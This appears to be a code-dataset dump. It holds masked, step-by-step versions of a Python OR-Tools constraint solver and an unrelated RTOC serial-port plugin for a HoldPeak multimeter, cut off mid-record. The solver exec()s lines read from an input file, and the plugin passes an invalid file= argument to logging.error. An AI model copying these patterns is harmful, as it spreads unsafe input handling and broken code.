[solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverComb(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef ortoolsSolverReduceVar(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverRange(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-100, 1000, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverNeg(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-2147483648, 2147483647, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverComb(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\nif __name__ == '__main__':\n file = sys.argv[1]\n f = open(file)\n for i in range(5):\n exec(f.readline())\n f.close()\n [sat, token, play, total_fun, time] = ortoolsSolverComb(num, cap,\n refill, fun, goal)\n print('Status:', sat)\n if sat == 'OPTIMAL':\n print('Maximum total fun:', total_fun)\n", "step-4": "from ortools.sat.python import cp_model\nimport os\nimport math\nimport csv\nimport sys\n\n\ndef ortoolsSolverReduceVar(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverRange(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-100, 1000, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverNeg(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-2147483648, 2147483647, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverComb(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\nif __name__ == '__main__':\n file = sys.argv[1]\n f = open(file)\n for i in range(5):\n exec(f.readline())\n f.close()\n [sat, token, play, total_fun, time] = ortoolsSolverComb(num, cap,\n refill, fun, goal)\n print('Status:', sat)\n if sat == 'OPTIMAL':\n print('Maximum total fun:', total_fun)\n", "step-5": "from ortools.sat.python import cp_model\nimport os\nimport math\nimport csv\nimport sys\n\ndef ortoolsSolverReduceVar(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i)\n for i in range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i)\n for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i)\n for i in range(1, num + 1)]\n total_fun = sum([fun[i] * play[i] for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <=\n cap).OnlyEnforceIf(compare[i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] +\n refill).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\ndef ortoolsSolverRange(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i)\n for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i)\n for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i)\n for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-100, 1000, 'total_fun')\n model.Add(total_fun == sum([fun[i] * play[i] for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <=\n cap).OnlyEnforceIf(compare[i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] +\n refill).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverNeg(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i)\n for i in range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i)\n for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i)\n for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i)\n for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-2147483648, 2147483647, 'total_fun')\n model.Add(total_fun == sum([fun[i] * play[i] for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <=\n cap).OnlyEnforceIf(compare[i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] +\n refill).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\ndef ortoolsSolverComb(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i)\n for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i)\n for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i)\n for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i)\n for i in range(1, num + 1)]\n total_fun = sum([fun[i] * play[i] for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <=\n cap).OnlyEnforceIf(compare[i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] +\n refill).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\nif __name__ == '__main__':\n file = sys.argv[1]\n f = open(file)\n for i in range(5):\n exec(f.readline())\n f.close()\n [sat, token, play, total_fun, time] = ortoolsSolverComb(\n num, cap, refill, fun, goal)\n print('Status:', sat)\n if sat == 'OPTIMAL':\n print('Maximum total fun:', total_fun)\n", "step-ids": [ 2, 4, 5, 6, 7 ] }
[ 2, 4, 5, 6, 7 ]
try: from LoggerPlugin import LoggerPlugin except ImportError: from RTOC.LoggerPlugin import LoggerPlugin from .holdPeak_VC820.vc820py.vc820 import MultimeterMessage import serial import sys import traceback from PyQt5 import uic from PyQt5 import QtWidgets import logging as log log.basicConfig(level=log.INFO) logging = log.getLogger(__name__) devicename = "HoldPeak" default_device = 'COM7' SERIAL_BAUDRATE = 2400 SERIAL_BYTESIZE = 8 SERIAL_TIMEOUT = 1 SAMPLERATE = 1 class Plugin(LoggerPlugin): """ Zeichnet die Messdaten eines HoldPeak VC820 Multimeters auf """ def __init__(self, *args, **kwargs): # Plugin setup super(Plugin, self).__init__(*args, **kwargs) self.setDeviceName(devicename) self.smallGUI = True self._last_value = 0 self._jump_allowed = True # Data-logger thread self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE) # self.updater.start() def __openPort(self, portname=default_device): # Communication setup #self.portname = "/dev/ttyUSB0" #self.portname = "COM7" self.portname = portname ################################################################################# # os.system("sudo chmod a+rw /dev/ttyUSB0") # ####### # uncomment this line if you do not set device rules: # > sudo nano /etc/udev/rules.d/50-myusb.rules # > * SUBSYSTEMS=="usb", ATTRS{idVendor}=="067b", ATTRS{idProduct}=="2303", GROUP="users", MODE="0666" # > [Strg+O, Strg+X] # > sudo udevadm control --reload # Ref: http://ask.xmodulo.com/change-usb-device-permission-linux.html ################################################################################# try: self._serial_port = serial.Serial( self.portname, baudrate=SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE, timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1) # dtr and rts settings required for adapter self._serial_port.dtr = True self._serial_port.rts = False # ------------- return True except Exception: tb = traceback.format_exc() logging.debug(tb) return False # THIS IS YOUR THREAD def _updateT(self): valid, value, unit = self._get_data() if unit == "V": datanames = ["Spannung"] elif unit == "A": datanames = ["Strom"] elif unit == "Ohm": datanames = ["Widerstand"] elif unit == "°C": datanames = ["Temperatur"] elif unit == "F": datanames = ["Kapazität"] elif unit == "Hz": datanames = ["Frequenz"] else: datanames = [unit] if valid: if abs(self._last_value-value) >= 2 and not self._jump_allowed: self._jump_allowed = True else: self.stream(y=[value], snames=datanames, unit=unit) self._jump_allowed = False self._last_value = value def loadGUI(self): self.widget = QtWidgets.QWidget() packagedir = self.getDir(__file__) uic.loadUi(packagedir+"/holdPeak_VC820/portSelectWidget.ui", self.widget) # self.setCallbacks() self.widget.pushButton.clicked.connect(self.__openPortCallback) self.__openPortCallback() return self.widget def __openPortCallback(self): if self.run: self.cancel() self.widget.pushButton.setText("Verbinden") else: port = self.widget.comboBox.currentText() if self.__openPort(port): self.start() self.widget.pushButton.setText("Beenden") else: self.cancel() self.widget.pushButton.setText("Fehler") def _get_data(self): test = self._serial_port.read(1) if len(test) != 1: logging.error("recieved incomplete data, skipping...", file=sys.stderr) return False, None, None if MultimeterMessage.check_first_byte(test[0]): data = test + self._serial_port.read(MultimeterMessage.MESSAGE_LENGTH-1) else: logging.error("received incorrect data (%s), skipping..." % test.hex(), file=sys.stderr) return False, None, None if len(data) != MultimeterMessage.MESSAGE_LENGTH: logging.error("received incomplete message (%s), skipping..." % data.hex(), file=sys.stderr) return False, None, None try: message = MultimeterMessage(data) #message.value = message.get_base_reading() except ValueError as e: logging.debug(e) logging.error("Error decoding: %s on message %s" % (str(e), data.hex())) return False, None, None # logging.debug(str(message)) # return True, message.value, message.unit return True, round(message.value*message.multiplier, 10), message.base_unit if __name__ == "__main__": standalone = Plugin() standalone.setup()
normal
{ "blob_id": "c3efaeab600ec9a7a9fffdfad5c9dc1faad8fee7", "index": 726, "step-1": "<mask token>\n\n\nclass Plugin(LoggerPlugin):\n <mask token>\n\n def __init__(self, *args, **kwargs):\n super(Plugin, self).__init__(*args, **kwargs)\n self.setDeviceName(devicename)\n self.smallGUI = True\n self._last_value = 0\n self._jump_allowed = True\n self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE)\n\n def __openPort(self, portname=default_device):\n self.portname = portname\n try:\n self._serial_port = serial.Serial(self.portname, baudrate=\n SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE,\n timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1)\n self._serial_port.dtr = True\n self._serial_port.rts = False\n return True\n except Exception:\n tb = traceback.format_exc()\n logging.debug(tb)\n return False\n\n def _updateT(self):\n valid, value, unit = self._get_data()\n if unit == 'V':\n datanames = ['Spannung']\n elif unit == 'A':\n datanames = ['Strom']\n elif unit == 'Ohm':\n datanames = ['Widerstand']\n elif unit == '°C':\n datanames = ['Temperatur']\n elif unit == 'F':\n datanames = ['Kapazität']\n elif unit == 'Hz':\n datanames = ['Frequenz']\n else:\n datanames = [unit]\n if valid:\n if abs(self._last_value - value) >= 2 and not self._jump_allowed:\n self._jump_allowed = True\n else:\n self.stream(y=[value], snames=datanames, unit=unit)\n self._jump_allowed = False\n self._last_value = value\n\n def loadGUI(self):\n self.widget = QtWidgets.QWidget()\n packagedir = self.getDir(__file__)\n uic.loadUi(packagedir + '/holdPeak_VC820/portSelectWidget.ui', self\n .widget)\n self.widget.pushButton.clicked.connect(self.__openPortCallback)\n self.__openPortCallback()\n return self.widget\n <mask token>\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Plugin(LoggerPlugin):\n \"\"\"\nZeichnet die Messdaten eines HoldPeak VC820 Multimeters auf\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Plugin, self).__init__(*args, **kwargs)\n self.setDeviceName(devicename)\n self.smallGUI = True\n self._last_value = 0\n self._jump_allowed = True\n self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE)\n\n def __openPort(self, portname=default_device):\n self.portname = portname\n try:\n self._serial_port = serial.Serial(self.portname, baudrate=\n SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE,\n timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1)\n self._serial_port.dtr = True\n self._serial_port.rts = False\n return True\n except Exception:\n tb = traceback.format_exc()\n logging.debug(tb)\n return False\n\n def _updateT(self):\n valid, value, unit = self._get_data()\n if unit == 'V':\n datanames = ['Spannung']\n elif unit == 'A':\n datanames = ['Strom']\n elif unit == 'Ohm':\n datanames = ['Widerstand']\n elif unit == '°C':\n datanames = ['Temperatur']\n elif unit == 'F':\n datanames = ['Kapazität']\n elif unit == 'Hz':\n datanames = ['Frequenz']\n else:\n datanames = [unit]\n if valid:\n if abs(self._last_value - value) >= 2 and not self._jump_allowed:\n self._jump_allowed = True\n else:\n self.stream(y=[value], snames=datanames, unit=unit)\n self._jump_allowed = False\n self._last_value = value\n\n def loadGUI(self):\n self.widget = QtWidgets.QWidget()\n packagedir = self.getDir(__file__)\n uic.loadUi(packagedir + '/holdPeak_VC820/portSelectWidget.ui', self\n .widget)\n self.widget.pushButton.clicked.connect(self.__openPortCallback)\n self.__openPortCallback()\n return self.widget\n\n def __openPortCallback(self):\n if self.run:\n self.cancel()\n self.widget.pushButton.setText('Verbinden')\n else:\n port = self.widget.comboBox.currentText()\n if self.__openPort(port):\n self.start()\n self.widget.pushButton.setText('Beenden')\n else:\n self.cancel()\n self.widget.pushButton.setText('Fehler')\n\n def _get_data(self):\n test = self._serial_port.read(1)\n if len(test) != 1:\n logging.error('recieved incomplete data, skipping...', file=sys\n .stderr)\n return False, None, None\n if MultimeterMessage.check_first_byte(test[0]):\n data = test + self._serial_port.read(MultimeterMessage.\n MESSAGE_LENGTH - 1)\n else:\n logging.error('received incorrect data (%s), skipping...' %\n test.hex(), file=sys.stderr)\n return False, None, None\n if len(data) != MultimeterMessage.MESSAGE_LENGTH:\n logging.error('received incomplete message (%s), skipping...' %\n data.hex(), file=sys.stderr)\n return False, None, None\n try:\n message = MultimeterMessage(data)\n except ValueError as e:\n logging.debug(e)\n logging.error('Error decoding: %s on message %s' % (str(e),\n data.hex()))\n return False, None, None\n return True, round(message.value * message.multiplier, 10\n ), message.base_unit\n\n\n<mask token>\n", "step-3": "try:\n from LoggerPlugin import LoggerPlugin\nexcept ImportError:\n from RTOC.LoggerPlugin import LoggerPlugin\n<mask token>\nlog.basicConfig(level=log.INFO)\nlogging = log.getLogger(__name__)\ndevicename = 'HoldPeak'\ndefault_device = 'COM7'\nSERIAL_BAUDRATE = 2400\nSERIAL_BYTESIZE = 8\nSERIAL_TIMEOUT = 1\nSAMPLERATE = 1\n\n\nclass Plugin(LoggerPlugin):\n \"\"\"\nZeichnet die Messdaten eines HoldPeak VC820 Multimeters auf\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Plugin, self).__init__(*args, **kwargs)\n self.setDeviceName(devicename)\n self.smallGUI = True\n self._last_value = 0\n self._jump_allowed = True\n self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE)\n\n def __openPort(self, portname=default_device):\n self.portname = portname\n try:\n self._serial_port = serial.Serial(self.portname, baudrate=\n 